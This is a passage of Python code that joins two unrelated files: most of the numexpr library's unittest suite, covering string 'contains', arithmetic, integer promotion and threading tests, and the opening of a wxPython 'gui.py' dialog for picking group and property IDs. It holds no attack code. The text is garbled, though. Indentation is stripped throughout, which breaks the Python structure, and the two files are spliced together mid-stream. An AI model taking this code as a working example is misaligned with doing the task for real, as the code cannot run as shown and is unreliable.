def test_str_contains_basic0(self):
res = evaluate('contains(b"abc", b"ab")')
assert_equal(res, True)
def test_str_contains_basic1(self):
haystack = array([b'abc', b'def', b'xyz', b'x11', b'za'])
res = evaluate('contains(haystack, b"ab")')
assert_equal(res, [True, False, False, False, False])
def test_str_contains_basic2(self):
haystack = array([b'abc', b'def', b'xyz', b'x11', b'za'])
res = evaluate('contains(b"abcd", haystack)')
assert_equal(res, [True, False, False, False, False])
def test_str_contains_basic3(self):
haystacks = array(
[b'abckkk', b'adef', b'xyz', b'x11abcp', b'za', b'abc'])
needles = array(
[b'abc', b'def', b'aterr', b'oot', b'zu', b'ab'])
res = evaluate('contains(haystacks, needles)')
assert_equal(res, [True, True, False, False, False, True])
def test_str_contains_basic4(self):
needles = array(
[b'abc', b'def', b'aterr', b'oot', b'zu', b'ab c', b' abc',
b'abc '])
res = evaluate('contains(b"test abc here", needles)')
assert_equal(res, [True, False, False, False, False, False, True, True])
def test_str_contains_basic5(self):
needles = array(
[b'abc', b'ab c', b' abc', b' abc ', b'\tabc', b'c h'])
res = evaluate('contains(b"test abc here", needles)')
assert_equal(res, [True, False, True, True, False, True])
# Compare operation of Python 'in' operator with 'contains' using a
# product of two lists of strings.
def test_str_contains_listproduct(self):
from itertools import product
small = [
'It w', 'as th', 'e Whit', 'e Rab', 'bit,', ' tro', 'tting',
' sl', 'owly', ' back ', 'again,', ' and', ' lo', 'okin', 'g a',
'nxious', 'ly a', 'bou', 't a', 's it w', 'ent,', ' as i', 'f it',
' had l', 'ost', ' some', 'thi', 'ng; a', 'nd ', 'she ', 'heard ',
'it mut', 'terin', 'g to ', 'its', 'elf ', "'The",
' Duch', 'ess! T', 'he ', 'Duches', 's! Oh ', 'my dea', 'r paws',
'! Oh ', 'my f', 'ur ', 'and ', 'whiske', 'rs! ', 'She', "'ll g",
'et me', ' ex', 'ecu', 'ted, ', 'as su', 're a', 's f', 'errets',
' are f', 'errets', '! Wh', 'ere ', 'CAN', ' I hav', 'e d',
'roppe', 'd t', 'hem,', ' I wo', 'nder?', "' A", 'lice',
' gu', 'essed', ' in a', ' mom', 'ent ', 'tha', 't it w', 'as ',
'looki', 'ng f', 'or ', 'the fa', 'n and ', 'the', ' pai',
'r of w', 'hit', 'e kid', ' glo', 'ves', ', and ', 'she ',
'very g', 'ood', '-na', 'turedl', 'y be', 'gan h', 'unt', 'ing',
' about', ' for t', 'hem', ', but', ' they ', 'wer', 'e nowh',
'ere to', ' be', ' se', 'en--', 'ever', 'ythin', 'g seem', 'ed ',
'to ', 'have c', 'hang', 'ed ', 'since', ' he', 'r swim', ' in',
' the', ' pool,', ' and', ' the g', 'reat ', 'hal', 'l, w', 'ith',
' th', 'e gl', 'ass t', 'abl', 'e and ', 'the', ' li', 'ttle',
' doo', 'r, ha', 'd v', 'ani', 'shed c', 'omp', 'lete', 'ly.']
big = [
'It wa', 's the', ' W', 'hit', 'e ', 'Ra', 'bb', 'it, t', 'ro',
'tting s', 'lowly', ' back ', 'agai', 'n, and', ' l', 'ookin',
'g ', 'an', 'xiously', ' about ', 'as it w', 'ent, as', ' if ',
'it had', ' los', 't ', 'so', 'mething', '; and', ' she h',
'eard ', 'it ', 'mutteri', 'ng to', ' itself', " 'The ",
'Duchess', '! ', 'Th', 'e ', 'Duchess', '! Oh m', 'y de',
'ar paws', '! ', 'Oh my ', 'fu', 'r and w', 'hiskers', "! She'",
'll ', 'get', ' me ', 'execute', 'd,', ' a', 's ', 'su', 're as ',
'fe', 'rrets', ' are f', 'errets!', ' Wher', 'e CAN', ' I ha',
've dro', 'pped t', 'hem', ', I ', 'won', "der?' A",
'lice g', 'uess', 'ed ', 'in a m', 'omen', 't that', ' i',
't was l', 'ook', 'ing f', 'or th', 'e ', 'fan and', ' th', 'e p',
'air o', 'f whit', 'e ki', 'd glove', 's, and ', 'she v', 'ery ',
'good-na', 'tu', 'redl', 'y be', 'gan hun', 'ti', 'ng abou',
't for t', 'he', 'm, bu', 't t', 'hey ', 'were n', 'owhere',
' to b', 'e s', 'een-', '-eve', 'rythi', 'ng see', 'me', 'd ',
'to ha', 've', ' c', 'hanged', ' sinc', 'e her s', 'wim ',
'in the ', 'pool,', ' an', 'd the g', 'rea', 't h', 'all, wi',
'th the ', 'glas', 's t', 'able an', 'd th', 'e littl', 'e door,',
' had va', 'ni', 'shed co', 'mpletel', 'y.']
p = list(product(small, big))
python_in = [x[0] in x[1] for x in p]
a = [x[0].encode() for x in p]
b = [x[1].encode() for x in p]
res = [bool(x) for x in evaluate('contains(b, a)')]
assert_equal(res, python_in)
def test_str_contains_withemptystr1(self):
withemptystr = array([b'abc', b'def', b''])
res = evaluate('contains(b"abcd", withemptystr)')
assert_equal(res, [True, False, True])
def test_str_contains_withemptystr2(self):
withemptystr = array([b'abc', b'def', b''])
res = evaluate('contains(withemptystr, b"")')
assert_equal(res, [True, True, True])
class test_numexpr2(test_numexpr):
"""Testing with 2 threads"""
nthreads = 2
class test_evaluate(TestCase):
def test_simple(self):
a = array([1., 2., 3.])
b = array([4., 5., 6.])
c = array([7., 8., 9.])
x = evaluate("2*a + 3*b*c")
assert_array_equal(x, array([86., 124., 168.]))
def test_simple_expr_small_array(self):
x = arange(100.0)
y = evaluate("x")
assert_array_equal(x, y)
def test_simple_expr(self):
x = arange(1e6)
y = evaluate("x")
assert_array_equal(x, y)
# Test for issue #37
if sys.version_info[0] < 3:
        # In python 3 '/' performs true division, not integer division.
        # Integer division '//' is still not supported by numexpr
def test_zero_div(self):
x = arange(100, dtype='i4')
y = evaluate("1/x")
x2 = zeros(100, dtype='i4')
x2[1] = 1
assert_array_equal(x2, y)
# Test for issue #22
def test_true_div(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x/2"), x / 2)
assert_array_equal(evaluate("x/2", truediv=False), x / 2)
assert_array_equal(evaluate("x/2", truediv='auto'), x / 2)
assert_array_equal(evaluate("x/2", truediv=True), x / 2.0)
def test_left_shift(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x<<2"), x << 2)
def test_right_shift(self):
x = arange(10, dtype='i4')
assert_array_equal(evaluate("x>>2"), x >> 2)
# PyTables uses __nonzero__ among ExpressionNode objects internally
# so this should be commented out for the moment. See #24.
def test_boolean_operator(self):
x = arange(10, dtype='i4')
try:
evaluate("(x > 1) and (x < 9)")
except TypeError:
pass
else:
raise ValueError("should raise exception!")
def test_rational_expr(self):
a = arange(1e6)
b = arange(1e6) * 0.1
x = (a + 2 * b) / (1 + a + 4 * b * b)
y = evaluate("(a + 2*b) / (1 + a + 4*b*b)")
assert_array_almost_equal(x, y)
def test_complex64_expr(self):
def complex64_func(a, b):
            c = zeros(a.shape, dtype=np.complex64)  # bare complex64 is not imported above
c.real = a
c.imag = b
return c
a = arange(1e4, dtype='float32' )
b = (arange(1e4) ** 1e-5).astype('float32')
z = ( a + 1j * b ).astype( 'complex64' ) # RAM this is complex128 by default numpy rules
x = z.imag
x = sin(complex64_func(a,b)).real + z.imag
# RAM: this check cannot pass because we don't have a function to do this
# complex64(a,b) in the function list
y = evaluate("sin(complex64(a, b)).real + z.imag")
assert_array_almost_equal(x, y)
def test_complex_expr(self):
def complex(a, b):
c = zeros(a.shape, dtype=complex_)
c.real = a
c.imag = b
return c
a = arange(1e4)
b = arange(1e4) ** 1e-5
z = a + 1j * b
x = z.imag
x = sin(complex(a, b)).real + z.imag
y = evaluate("sin(complex(a, b)).real + z.imag")
assert_array_almost_equal(x, y)
def test_complex_strides(self):
a = arange(100).reshape(10, 10)[::2]
b = arange(50).reshape(5, 10)
assert_array_equal(evaluate("a+b"), a + b)
c = empty([10], dtype=[('c1', int32), ('c2', uint16)])
c['c1'] = arange(10)
c['c2'].fill(0xaaaa)
c1 = c['c1']
a0 = a[0]
assert_array_equal(evaluate("c1"), c1)
assert_array_equal(evaluate("a0+c1"), a0 + c1)
def test_broadcasting(self):
a = arange(100).reshape(10, 10)[::2]
c = arange(10)
d = arange(5).reshape(5, 1)
assert_array_equal(evaluate("a+c"), a + c)
assert_array_equal(evaluate("a+d"), a + d)
expr = NumExpr("2.0*a+3.0*c", [('a', double), ('c', double)])
assert_array_equal(expr(a, c), 2.0 * a + 3.0 * c)
def test_all_scalar(self):
a = 3.
b = 4.
assert_allclose(evaluate("a+b"), a + b)
expr = NumExpr("2*a+3*b", [('a', double), ('b', double)])
assert_equal(expr(a, b), 2 * a + 3 * b)
def test_run(self):
a = arange(100).reshape(10, 10)[::2]
b = arange(10)
expr = NumExpr("2*a+3*b", [('a', double), ('b', double)])
assert_array_equal(expr(a, b), expr.run(a, b))
def test_illegal_value(self):
a = arange(3)
try:
evaluate("a < [0, 0, 0]")
except TypeError:
pass
else:
self.fail()
if 'sparc' not in platform.machine():
# Execution order set here so as to not use too many threads
# during the rest of the execution. See #33 for details.
def test_changing_nthreads_00_inc(self):
            a = linspace(-1, 1, 10**6)
b = ((.25 * a + .75) * a - 1.5) * a - 2
for nthreads in range(1, 7):
numexpr.set_num_threads(nthreads)
c = evaluate("((.25*a + .75)*a - 1.5)*a - 2")
assert_array_almost_equal(b, c)
def test_changing_nthreads_01_dec(self):
            a = linspace(-1, 1, 10**6)
b = ((.25 * a + .75) * a - 1.5) * a - 2
for nthreads in range(6, 1, -1):
numexpr.set_num_threads(nthreads)
c = evaluate("((.25*a + .75)*a - 1.5)*a - 2")
assert_array_almost_equal(b, c)
tests = [
('MISC', ['b*c+d*e',
'2*a+3*b',
'-a',
'sinh(a)',
'2*a + (cos(3)+5)*sinh(cos(b))',
'2*a + arctan2(a, b)',
'arcsin(0.5)',
'where(a != 0.0, 2, a)',
'where(a > 10, b < a, b > a)',
'where((a-10).real != 0.0, a, 2)',
'0.25 * (a < 5) + 0.33 * (a >= 5)',
'cos(1+1)',
'1+1',
'1',
'cos(a2)',
])]
optests = []
for op in list('+-*/%') + ['**']:
optests.append("(a+1) %s (b+3)" % op)
optests.append("3 %s (b+3)" % op)
optests.append("(a+1) %s 4" % op)
optests.append("2 %s (b+3)" % op)
optests.append("(a+1) %s 2" % op)
optests.append("(a+1) %s -1" % op)
optests.append("(a+1) %s 0.5" % op)
# Check divisions and modulus by zero (see ticket #107)
optests.append("(a+1) %s 0" % op)
tests.append(('OPERATIONS', optests))
cmptests = []
for op in ['<', '<=', '==', '>=', '>', '!=']:
cmptests.append("a/2+5 %s b" % op)
cmptests.append("a/2+5 %s 7" % op)
cmptests.append("7 %s b" % op)
cmptests.append("7.0 %s 5" % op)
tests.append(('COMPARISONS', cmptests))
func1tests = []
for func in ['copy', 'ones_like', 'sqrt',
'sin', 'cos', 'tan', 'arcsin', 'arccos', 'arctan',
'sinh', 'cosh', 'tanh', 'arcsinh', 'arccosh', 'arctanh',
'log', 'log1p', 'log10', 'exp', 'expm1', 'abs', 'conj']:
func1tests.append("a + %s(b+c)" % func)
tests.append(('1_ARG_FUNCS', func1tests))
func2tests = []
for func in ['arctan2', 'fmod']:
func2tests.append("a + %s(b+c, d+1)" % func)
func2tests.append("a + %s(b+c, 1)" % func)
func2tests.append("a + %s(1, d+1)" % func)
tests.append(('2_ARG_FUNCS', func2tests))
powtests = []
# n = -1, 0.5, 2, 4 already handled in section "OPERATIONS"
for n in (-7, -2.5, -1.5, -1.3, -.5, 0, 0.0, 1, 2.3, 2.5, 3):
powtests.append("(a+1)**%s" % n)
tests.append(('POW_TESTS', powtests))
def equal(a, b, exact):
if array_equal(a, b):
return True
if hasattr(a, 'dtype') and a.dtype in ['f4', 'f8']:
nnans = isnan(a).sum()
if nnans > 0:
# For results containing NaNs, just check that the number
# of NaNs is the same in both arrays. This check could be
# made more exhaustive, but checking element by element in
# python space is very expensive in general.
return nnans == isnan(b).sum()
ninfs = isinf(a).sum()
if ninfs > 0:
# Ditto for Inf's
return ninfs == isinf(b).sum()
if exact:
return (shape(a) == shape(b)) and alltrue(ravel(a) == ravel(b), axis=0)
else:
if hasattr(a, 'dtype') and a.dtype == 'f4':
            atol = 1e-5  # Relax precision for special opcodes, like fmod
else:
atol = 1e-8
return (shape(a) == shape(b) and
allclose(ravel(a), ravel(b), atol=atol))
class Skip(Exception): pass
def test_expressions():
test_no = [0]
def make_test_method(a, a2, b, c, d, e, x, expr,
test_scalar, dtype, optimization, exact, section):
this_locals = locals()
def method():
# We don't want to listen at RuntimeWarnings like
# "overflows" or "divide by zero" in plain eval().
warnings.simplefilter("ignore")
npval = eval(expr, globals(), this_locals)
warnings.simplefilter("always")
npval = eval(expr, globals(), this_locals)
try:
neval = evaluate(expr, local_dict=this_locals,
optimization=optimization)
assert equal(npval, neval, exact), """%r
(test_scalar=%r, dtype=%r, optimization=%r, exact=%r,
npval=%r (%r - %r)\n neval=%r (%r - %r))""" % (expr, test_scalar, dtype.__name__,
optimization, exact,
npval, type(npval), shape(npval),
neval, type(neval), shape(neval))
except AssertionError:
raise
except NotImplementedError:
print('%r not implemented for %s (scalar=%d, opt=%s)'
% (expr, dtype.__name__, test_scalar, optimization))
except:
print('numexpr error for expression %r' % (expr,))
raise
method.description = ('test_expressions(%s, test_scalar=%r, '
'dtype=%r, optimization=%r, exact=%r)') \
% (expr, test_scalar, dtype.__name__, optimization, exact)
test_no[0] += 1
method.__name__ = 'test_scalar%d_%s_%s_%s_%04d' % (test_scalar,
dtype.__name__,
optimization.encode('ascii'),
section.encode('ascii'),
test_no[0])
return method
x = None
for test_scalar in (0, 1, 2):
for dtype in (int, long, np.float32, double, complex):
array_size = 100
a = arange(2 * array_size, dtype=dtype)[::2]
a2 = zeros([array_size, array_size], dtype=dtype)
b = arange(array_size, dtype=dtype) / array_size
c = arange(array_size, dtype=dtype)
d = arange(array_size, dtype=dtype)
e = arange(array_size, dtype=dtype)
if dtype == complex:
a = a.real
for x in [a2, b, c, d, e]:
x += 1j
x *= 1 + 1j
if test_scalar == 1:
a = a[array_size // 2]
if test_scalar == 2:
b = b[array_size // 2]
for optimization, exact in [
('none', False), ('moderate', False), ('aggressive', False)]:
for section_name, section_tests in tests:
for expr in section_tests:
if (dtype == complex and
('<' in expr or '>' in expr or '%' in expr
or "arctan2" in expr or "fmod" in expr)):
# skip complex comparisons or functions not
# defined in complex domain.
continue
if (dtype in (int, long) and test_scalar and
expr == '(a+1) ** -1'):
continue
m = make_test_method(a, a2, b, c, d, e, x,
expr, test_scalar, dtype,
optimization, exact,
section_name)
yield m
class test_int64(TestCase):
def test_neg(self):
a = array([2 ** 31 - 1, 2 ** 31, 2 ** 32, 2 ** 63 - 1], dtype=int64)
res = evaluate('-a')
assert_array_equal(res, [1 - 2 ** 31, -(2 ** 31), -(2 ** 32), 1 - 2 ** 63])
self.assertEqual(res.dtype.name, 'int64')
class test_int32_int64(TestCase):
    if sys.version_info[0] < 3:
# no long literals in python 3
def test_small_long(self):
# Small longs should not be downgraded to ints.
res = evaluate('42L')
assert_array_equal(res, 42)
self.assertEqual(res.dtype.name, 'int64')
def test_small_int(self):
# Small ints (32-bit ones) should not be promoted to longs.
res = evaluate('2')
assert_array_equal(res, 2)
self.assertEqual(res.dtype.name, 'int32')
def test_big_int(self):
# Big ints should be promoted to longs.
res = evaluate('2**40')
assert_array_equal(res, 2 ** 40)
self.assertEqual(res.dtype.name, 'int64')
def test_long_constant_promotion(self):
int32array = arange(100, dtype='int32')
itwo = np.int32(2)
ltwo = np.int64(2)
res = int32array * 2
res32 = evaluate('int32array * itwo')
res64 = evaluate('int32array * ltwo')
assert_array_equal(res, res32)
assert_array_equal(res, res64)
self.assertEqual(res32.dtype.name, 'int32')
self.assertEqual(res64.dtype.name, 'int64')
def test_int64_array_promotion(self):
int32array = arange(100, dtype='int32')
int64array = arange(100, dtype='int64')
respy = int32array * int64array
resnx = evaluate('int32array * int64array')
assert_array_equal(respy, resnx)
self.assertEqual(resnx.dtype.name, 'int64')
class test_uint32_int64(TestCase):
def test_small_uint32(self):
# Small uint32 should not be downgraded to ints.
a = np.uint32(42)
res = evaluate('a')
assert_array_equal(res, 42)
self.assertEqual(res.dtype.name, 'int64')
def test_uint32_constant_promotion(self):
int32array = arange(100, dtype='int32')
stwo = np.int32(2)
utwo = np.uint32(2)
res = int32array * utwo
res32 = evaluate('int32array * stwo')
res64 = evaluate('int32array * utwo')
assert_array_equal(res, res32)
assert_array_equal(res, res64)
self.assertEqual(res32.dtype.name, 'int32')
self.assertEqual(res64.dtype.name, 'int64')
def test_int64_array_promotion(self):
uint32array = arange(100, dtype='uint32')
int64array = arange(100, dtype='int64')
respy = uint32array * int64array
resnx = evaluate('uint32array * int64array')
assert_array_equal(respy, resnx)
self.assertEqual(resnx.dtype.name, 'int64')
class test_strings(TestCase):
BLOCK_SIZE1 = 128
BLOCK_SIZE2 = 8
str_list1 = [b'foo', b'bar', b'', b' ']
str_list2 = [b'foo', b'', b'x', b' ']
str_nloops = len(str_list1) * (BLOCK_SIZE1 + BLOCK_SIZE2 + 1)
str_array1 = array(str_list1 * str_nloops)
str_array2 = array(str_list2 * str_nloops)
str_constant = b'doodoo'
def test_null_chars(self):
str_list = [
b'\0\0\0', b'\0\0foo\0', b'\0\0foo\0b', b'\0\0foo\0b\0',
b'foo\0', b'foo\0b', b'foo\0b\0', b'foo\0bar\0baz\0\0']
for s in str_list:
r = evaluate('s')
self.assertEqual(s, r.tostring()) # check *all* stored data
def test_compare_copy(self):
sarr = self.str_array1
expr = 'sarr'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_array(self):
sarr1 = self.str_array1
sarr2 = self.str_array2
expr = 'sarr1 >= sarr2'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_variable(self):
sarr = self.str_array1
svar = self.str_constant
expr = 'sarr >= svar'
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_compare_constant(self):
sarr = self.str_array1
expr = 'sarr >= %r' % self.str_constant
res1 = eval(expr)
res2 = evaluate(expr)
assert_array_equal(res1, res2)
def test_add_string_array(self):
sarr1 = self.str_array1
sarr2 = self.str_array2
expr = 'sarr1 + sarr2'
self.assert_missing_op('add_sss', expr, locals())
def test_empty_string1(self):
a = np.array(["", "pepe"])
b = np.array(["pepe2", ""])
res = evaluate("(a == '') & (b == 'pepe2')")
assert_array_equal(res, np.array([True, False]))
res2 = evaluate("(a == 'pepe') & (b == '')")
assert_array_equal(res2, np.array([False, True]))
def test_empty_string2(self):
a = np.array(["p", "pepe"])
b = np.array(["pepe2", ""])
res = evaluate("(a == '') & (b == 'pepe2')")
assert_array_equal(res, np.array([False, False]))
res2 = evaluate("(a == 'pepe') & (b == '')")
assert_array_equal(res, np.array([False, False]))
def test_add_numeric_array(self):
sarr = self.str_array1
narr = arange(len(sarr), dtype='int32')
expr = 'sarr >= narr'
self.assert_missing_op('ge_bsi', expr, locals())
def assert_missing_op(self, op, expr, local_dict):
msg = "expected NotImplementedError regarding '%s'" % op
try:
evaluate(expr, local_dict)
        except NotImplementedError as nie:
if "'%s'" % op not in nie.args[0]:
self.fail(msg)
else:
self.fail(msg)
def test_compare_prefix(self):
# Check comparing two strings where one is a prefix of the
# other.
for s1, s2 in [(b'foo', b'foobar'), (b'foo', b'foo\0bar'),
(b'foo\0a', b'foo\0bar')]:
self.assertTrue(evaluate('s1 < s2'))
self.assertTrue(evaluate('s1 <= s2'))
self.assertTrue(evaluate('~(s1 == s2)'))
self.assertTrue(evaluate('~(s1 >= s2)'))
self.assertTrue(evaluate('~(s1 > s2)'))
# Check for NumPy array-style semantics in string equality.
s1, s2 = b'foo', b'foo\0\0'
self.assertTrue(evaluate('s1 == s2'))
# Case for testing selections in fields which are aligned but whose
# data length is not an exact multiple of the length of the record.
# The following test exposes the problem only in 32-bit machines,
# because in 64-bit machines 'c2' is unaligned. However, this should
# check most platforms where, while not unaligned, 'len(datatype) >
# boundary_alignment' is fulfilled.
class test_irregular_stride(TestCase):
def test_select(self):
f0 = arange(10, dtype=int32)
f1 = arange(10, dtype=float64)
irregular = rec.fromarrays([f0, f1])
f0 = irregular['f0']
f1 = irregular['f1']
i0 = evaluate('f0 < 5')
i1 = evaluate('f1 < 5')
assert_array_equal(f0[i0], arange(5, dtype=int32))
assert_array_equal(f1[i1], arange(5, dtype=float64))
# Cases for testing arrays with dimensions that can be zero.
class test_zerodim(TestCase):
def test_zerodim1d(self):
a0 = array([], dtype=int32)
a1 = array([], dtype=float64)
r0 = evaluate('a0 + a1')
r1 = evaluate('a0 * a1')
assert_array_equal(r0, a1)
assert_array_equal(r1, a1)
def test_zerodim3d(self):
a0 = array([], dtype=int32).reshape(0, 2, 4)
a1 = array([], dtype=float64).reshape(0, 2, 4)
r0 = evaluate('a0 + a1')
r1 = evaluate('a0 * a1')
assert_array_equal(r0, a1)
assert_array_equal(r1, a1)
@contextmanager
def _environment(key, value):
old = os.environ.get(key)
os.environ[key] = value
try:
yield
finally:
        if old is not None:  # restore even an empty-string value
os.environ[key] = old
else:
del os.environ[key]
# Test cases for the threading configuration
class test_threading_config(TestCase):
def test_numexpr_num_threads(self):
with _environment('OMP_NUM_THREADS', '5'):
with _environment('NUMEXPR_NUM_THREADS', '3'):
                self.assertEqual(3, numexpr.detect_number_of_threads())
def test_omp_num_threads(self):
with _environment('OMP_NUM_THREADS', '5'):
            self.assertEqual(5, numexpr.detect_number_of_threads())
# Case test for threads
class test_threading(TestCase):
def test_thread(self):
import threading
class ThreadTest(threading.Thread):
def run(self):
a = arange(3)
assert_array_equal(evaluate('a**3'), array([0, 1, 8]))
test = ThreadTest()
test.start()
# The worker function for the subprocess (needs to be here because Windows
# has problems pickling nested functions with the multiprocess module :-/)
def _worker(qout=None):
ra = np.arange(1e3)
rows = evaluate('ra > 0')
#print "Succeeded in evaluation!\n"
if qout is not None:
qout.put("Done")
# Case test for subprocesses (via multiprocessing module)
class test_subprocess(TestCase):
def test_multiprocess(self):
try:
import multiprocessing as mp
except ImportError:
return
# Check for two threads at least
numexpr.set_num_threads(2)
#print "**** Running from main process:"
_worker()
#print "**** Running from subprocess:"
qout = mp.Queue()
ps = mp.Process(target=_worker, args=(qout,))
ps.daemon = True
ps.start()
result = qout.get()
#print result
def print_versions():
"""Print the versions of software that numexpr relies on."""
from pkg_resources import parse_version
if parse_version(np.__version__) < parse_version(minimum_numpy_version):
print("*Warning*: NumPy version is lower than recommended: %s < %s" % \
(np.__version__, minimum_numpy_version))
print('-=' * 38)
print("Numexpr version: %s" % numexpr.__version__)
print("NumPy version: %s" % np.__version__)
print('Python version: %s' % sys.version)
if os.name == 'posix':
(sysname, nodename, release, version, machine) = os.uname()
print('Platform: %s-%s' % (sys.platform, machine))
print("AMD/Intel CPU? %s" % numexpr.is_cpu_amd_intel)
print("VML available? %s" % use_vml)
if use_vml:
print("VML/MKL version: %s" % numexpr.get_vml_version())
print("Number of threads used by default: %d "
"(out of %d detected cores)" % (numexpr.nthreads, numexpr.ncores))
print('-=' * 38)
def test():
"""
Run all the tests in the test suite.
"""
print_versions()
return unittest.TextTestRunner().run(suite())
test.__test__ = False
def suite():
import unittest
import platform as pl
theSuite = unittest.TestSuite()
niter = 1
class TestExpressions(TestCase):
pass
def add_method(func):
def method(self):
return func()
setattr(TestExpressions, func.__name__,
method.__get__(None, TestExpressions))
for func in test_expressions():
add_method(func)
for n in range(niter):
theSuite.addTest(unittest.makeSuite(test_numexpr))
if 'sparc' not in platform.machine():
theSuite.addTest(unittest.makeSuite(test_numexpr2))
theSuite.addTest(unittest.makeSuite(test_evaluate))
theSuite.addTest(unittest.makeSuite(TestExpressions))
theSuite.addTest(unittest.makeSuite(test_int32_int64))
theSuite.addTest(unittest.makeSuite(test_uint32_int64))
theSuite.addTest(unittest.makeSuite(test_strings))
theSuite.addTest(
unittest.makeSuite(test_irregular_stride))
theSuite.addTest(unittest.makeSuite(test_zerodim))
theSuite.addTest(unittest.makeSuite(test_threading_config))
# multiprocessing module is not supported on Hurd/kFreeBSD
if (pl.system().lower() not in ('gnu', 'gnu/kfreebsd')):
theSuite.addTest(unittest.makeSuite(test_subprocess))
    # I need to put this test after test_subprocess because
    # if not, the test suite locks immediately before test_subprocess.
    # This only happens on Windows, so I suspect a subtle bad
    # interaction between threads and subprocess :-/
theSuite.addTest(unittest.makeSuite(test_threading))
return theSuite
if __name__ == '__main__':
print_versions()
unittest.main(defaultTest='suite')
# suite = suite()
# unittest.TextTestRunner(verbosity=2).run(suite)
|
gui.py | import util, wx, time, threading, pprint, os, urllib
from util import get_api_client, get_input_args, print_err, pprint_err
from subprocess import Popen, PIPE
goatc_buttons = []
property_dialog = None
listbox_groupid = None
label_groupid = None
label_populatedgroupid = None
listbox_populatedgroupid_locked = False
listbox_propertyid = None
label_populatedpropertyid = None
listbox_populatedpropertyid_locked = False
class SelectPropertyDialog(wx.Dialog):
def go(self, flag):
if (flag == False):
self.Close()
else:
wx.MessageBox("Wait for the current operation to complete before continuing.")
def __init__(self):
wx.Dialog.__init__(self, None, title="Select Other Property",style=(~wx.CLOSE_BOX))
self.SetSize(size=(400,400))
other_hidden_label = wx.StaticText(self, label="", pos=(0, 0))
other_hidden_label.Hide()
groupbtn = wx.Button(self, label="Get Group IDs", pos=(275,10))
groupbtn.Bind(wx.EVT_BUTTON, populate_group_id_nonblocking)
global txtctrl_switchkey
label_currentkey = wx.StaticText(self, label="Current Switch Key: " + txtctrl_switchkey.GetValue(), pos=(10, 10))
global label_populatedgroupid
label_populatedgroupid = wx.StaticText(self, label="", pos=(10, 16))
global listbox_populatedgroupid_locked
label_getproperties = wx.StaticText(self, label="Property ID List:", pos=(10, 185))
global label_populatedpropertyid
label_populatedpropertyid = wx.StaticText(self, label="...", pos=(10, 190))
global listbox_populatedpropertyid_locked
propertybtn = wx.Button(self, label="Get Property IDs", pos=(265,185))
global listbox_propertyid
listbox_propertyid = wx.ListBox(self, pos=(10, 205), size=(375,150))
propertybtn.Bind(wx.EVT_BUTTON, populate_property_id_nonblocking)
gobtn = wx.Button(self, label="Go!", pos=(300,355))
gobtn.Bind(wx.EVT_BUTTON, lambda event: self.go(listbox_populatedgroupid_locked))
global property_dialog
property_dialog = self
global listbox_groupid
listbox_groupid = wx.ListBox(self, pos=(10, 31), size=(375,150))
window.Bind(wx.EVT_TIMER, lambda evt, temp=other_hidden_label: update_continuously(evt, temp))
def select_other_property(e):
global txtctrl_switchkey
if (txtctrl_switchkey.GetValue() == ""):
wx.MessageBox("You must enter a switch key to select a property.")
else:
dlg = SelectPropertyDialog()
dlg.ShowModal()
window.Unbind(wx.EVT_TIMER)
dlg.Destroy()
return False
def reset_form(e):
global button_test_pragmas
button_test_pragmas.SetValue(False)
for button in goatc_buttons:
button.reset()
class GoatcButton(wx.Button):
toggled = False
default_label = ""
default_prefix = ""
def reset(self):
self.SetLabel(self.default_label)
self.toggled = False
self.SetOwnForegroundColour(wx.BLACK)
def toggle_binary_test_condition(self,e):
if (self.toggled):
self.reset()
else:
self.SetLabel(self.default_prefix)
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
def toggle_integral_test_condition(self,e):
if (self.toggled):
self.toggled = False
self.SetLabel(self.default_label)
self.SetOwnForegroundColour(wx.BLACK)
else:
dialog = wx.TextEntryDialog(self, "Enter integer value",
"Test Condition", "", wx.OK | wx.CANCEL)
if dialog.ShowModal() == wx.ID_OK:
try:
number = int(dialog.GetValue())
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
self.SetLabel(self.default_prefix+"=" + dialog.GetValue())
                except ValueError:
                    wx.MessageBox("Invalid value, only integers allowed.", "Error")
dialog.Destroy()
def toggle_int_comma_string_condition(self,e):
if (self.toggled):
self.toggled = False
self.SetLabel(self.default_label)
self.SetOwnForegroundColour(wx.BLACK)
else:
            dialog = wx.TextEntryDialog(self, "Enter INT,STRING (an integer, followed by a comma, and then text)",
"Test Condition", "", wx.OK | wx.CANCEL)
if dialog.ShowModal() == wx.ID_OK:
try:
                    value = dialog.GetValue()  # avoid shadowing the builtin str
                    contents = value.split(",")
                    number = int(contents[0])
                    text = contents[1]
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
self.SetLabel(self.default_prefix+"=" + contents[0] + "," + text)
                except (ValueError, IndexError):
                    wx.MessageBox("Invalid value, expected INT,STRING.", "Error")
dialog.Destroy()
def toggle_integral_y_or_n_condition(self,e):
if (self.toggled):
self.toggled = False
self.SetLabel(self.default_label)
self.SetOwnForegroundColour(wx.BLACK)
else:
dialog = wx.TextEntryDialog(self, "Enter Y or N",
"Test Condition", "", wx.OK | wx.CANCEL)
if dialog.ShowModal() == wx.ID_OK:
txt = (dialog.GetValue()).upper()
if (txt == "Y" or txt == "N"):
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
self.SetLabel(self.default_prefix+"=" + txt)
else:
wx.MessageBox("Invalid value, only Y or N allowed.", "Error")
dialog.Destroy()
def toggle_string_condition(self,e):
if (self.toggled):
self.toggled = False
self.SetLabel(self.default_label)
self.SetOwnForegroundColour(wx.BLACK)
else:
dialog = wx.TextEntryDialog(self, "Enter text string",
"Test Condition", "", wx.OK | wx.CANCEL)
if dialog.ShowModal() == wx.ID_OK:
txt = dialog.GetValue()
self.SetOwnForegroundColour(wx.GREEN)
self.toggled = True
self.SetLabel(self.default_prefix+"=" + txt)
dialog.Destroy()
def __init__(self, panel, label, pos, size, default_bind = True):
super().__init__(panel, label=label, pos=pos, size=size)
self.default_label = self.GetLabel()
self.default_prefix = self.default_label.split("=")[0]
self.SetOwnForegroundColour(wx.BLACK)
goatc_buttons.append(self)
if (default_bind == True):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_binary_test_condition(event))
elif (default_bind == "Integer"):
self.Bind(wx.EVT_BUTTON, lambda event: self.toggle_integral_test_condition(event))
